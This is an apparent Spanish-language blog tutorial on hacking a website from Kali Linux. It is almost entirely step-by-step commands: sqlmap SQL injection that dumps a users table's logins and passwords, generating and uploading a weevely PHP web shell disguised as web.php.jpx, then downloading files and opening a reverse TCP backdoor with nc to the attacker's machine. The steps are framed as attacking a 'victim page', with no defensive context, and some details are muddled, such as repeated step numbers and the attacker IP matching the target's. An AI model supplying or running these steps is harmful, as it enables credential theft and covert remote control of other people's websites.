Kali linux hackear una pagina web y manipularla desde kali linux ?

hackear%2Buna%2Bpagina%2Bweb%2Bpara%2Bpoder%2Bmanipularla

1.- Vamos a obtener la bd

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Esto nos debe de regresar algo asi
2018 12 20 09 07

2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Este es el resultado
2018 12 20 09 59

3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Este es el resultado:
2018 12 20 10 06

4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

Listo hemos obtenido el usuario y password.

2018 12 20 10 09

2.- Una vez obtenida el usuario y contraseña procedemos a instalar la herramienta PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
3.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git 
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo
En caso de que el anterior comando de errores quizas falta instalar dependencias como se muestra aqui
Subimos el archivo web.php.jpx a la pagina victima
Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png
Para mayor comodidad podemos crear un TCP reverse backdoor asi:
nc -l -p 5412
:backdoor_reversetcp
192.168.8.103
5412
Donde
192.168.8.103 La ip de nustro kali

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

En Programador Novato vivimos de los anuncios, hemos detectado que está utilizando extensiones para bloquear anuncios. Ayudanos deshabilitando tu bloqueador de anuncios. :)